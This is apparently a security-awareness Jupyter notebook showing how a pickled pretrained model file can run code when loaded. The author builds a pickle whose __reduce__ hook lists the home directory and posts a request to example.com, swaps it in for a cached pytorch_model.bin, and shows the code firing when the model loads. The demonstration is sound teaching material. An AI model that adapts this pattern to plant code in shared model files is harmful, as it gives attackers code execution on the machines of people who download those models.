---
---
# Pretrained Model Security Risk

This notebook contains a simple demonstration of one type of risk associated with using a pretrained model.

In [18]:
import pickle
import requests
import os
from transformers import AutoTokenizer, AutoModel
import torch

---
### Loading a pre-trained model from Hugging Face

In [4]:
model_name = "gg-ai/distill-bert-1220"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModel.from_pretrained(model_name)

Downloading (…)okenizer_config.json: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 398/398 [00:00<00:00, 215kB/s]
Downloading (…)solve/main/vocab.txt: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 248k/248k [00:00<00:00, 5.89MB/s]
Downloading (…)/main/tokenizer.json: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 735k/735k [00:00<00:00, 4.17MB/s]
Downloading (…)cial_tokens_map.json: 100%|█

Loading a pretrained model results in downloading the directory shown below.

Note the link `pytorch_model.bin` points at a file that is a pickle. This is a binary file that contains the byte stream from serializing an object (a Pytorch model in this case).

In [5]:
!tree /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220

[01;34m/Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220[0m
├── [01;34mblobs[0m
│   ├── [00m0bcbea577210dc608bcd9dfd932d0e7eb49890da[0m
│   ├── [00m10752ff4bd656c542cac209e9e034e5d3a5a0979[0m
│   ├── [00m5994899e3a01721d74cafd0a7ada28588707f759[0m
│   ├── [00m8f80d4a1897f3fdc6d8b2e13a426108eb3f771b6[0m
│   ├── [00m90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da[0m
│   └── [00ma8b3208c2884c4efb86e49300fdd3dc877220cdf[0m
├── [01;34mrefs[0m
│   └── [00mmain[0m
└── [01;34msnapshots[0m
    └── [01;34m39fb408f872303ffc0bff9dc4f8ba95e150eae53[0m
        ├── [01;36mconfig.json[0m -> [00m../../blobs/5994899e3a01721d74cafd0a7ada28588707f759[0m
        ├── [01;36mpytorch_model.bin[0m -> [00m../../blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da[0m
        ├── [01;36mspecial_tokens_map.json[0m -> [00m../../blobs/a8b3208c2884c4efb86e49300fdd3dc877220cdf[0m
        ├── [01;36mtokenizer.json[0m -> [00m../

---
### Suppose the `.bin` was malicious

Let's create a pickle that does something dangerous and replace `pytorch_model.bin`. 

And because this is a binary file that saves the byte stream from serialization, you can't inspect it before unserializing it.

In [15]:
class GetRequestOnUnpickle:
    def __init__(self):
        print(os.listdir(os.path.expanduser("~")))
        print('')
        response = requests.post("https://www.example.com")
        print(response)
        
    def __reduce__(self):
        return (self.__class__, ())


obj = GetRequestOnUnpickle()

with open('risky.pickle', 'wb') as f:
    pickle.dump(obj, f)

['.config', 'Music', '.docker', '.vim', '.DS_Store', 'nltk_data', '.CFUserTextEncoding', '.zshrc', '.local', 'Projects', 'Pictures', '.zprofile', '.zsh_history', '.ipython', 'Desktop', 'Library', '.matplotlib', '.lesshst', '.cups', 'Public', '.keepassxc', '.ssh', 'Movies', '.vimrc', '.Trash', '.jupyter', '.npm', '.terraform.d', 'Documents', '.pyenv', '.vscode', 'Downloads', '.python_history', '.cache', '.aws', '.gitconfig', '.viminfo', '.zsh_sessions']

<Response [200]>


In [16]:
#!mv /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220/blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220/blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da_real
!mv /Users/aaron/Projects/pickles/risky.pickle /Users/aaron/.cache/huggingface/hub/models--gg-ai--distill-bert-1220/blobs/90608f51a38c6de28bdde4c028f7a167f568ffc20e27bc74a371f5541c26c8da

Now, if you loaded a model that contained this `.bin`, it accesses your file system and sends a post request!

In [20]:
try:
    model = AutoModel.from_pretrained(model_name)
except:
    pass

['.config', 'Music', '.docker', '.vim', '.DS_Store', 'nltk_data', '.CFUserTextEncoding', '.zshrc', '.local', 'Projects', 'Pictures', '.zprofile', '.zsh_history', '.ipython', 'Desktop', 'Library', '.matplotlib', '.lesshst', '.cups', 'Public', '.keepassxc', '.ssh', 'Movies', '.vimrc', '.Trash', '.jupyter', '.npm', '.terraform.d', 'Documents', '.pyenv', '.vscode', 'Downloads', '.python_history', '.cache', '.aws', '.gitconfig', '.viminfo', '.zsh_sessions']

<Response [200]>
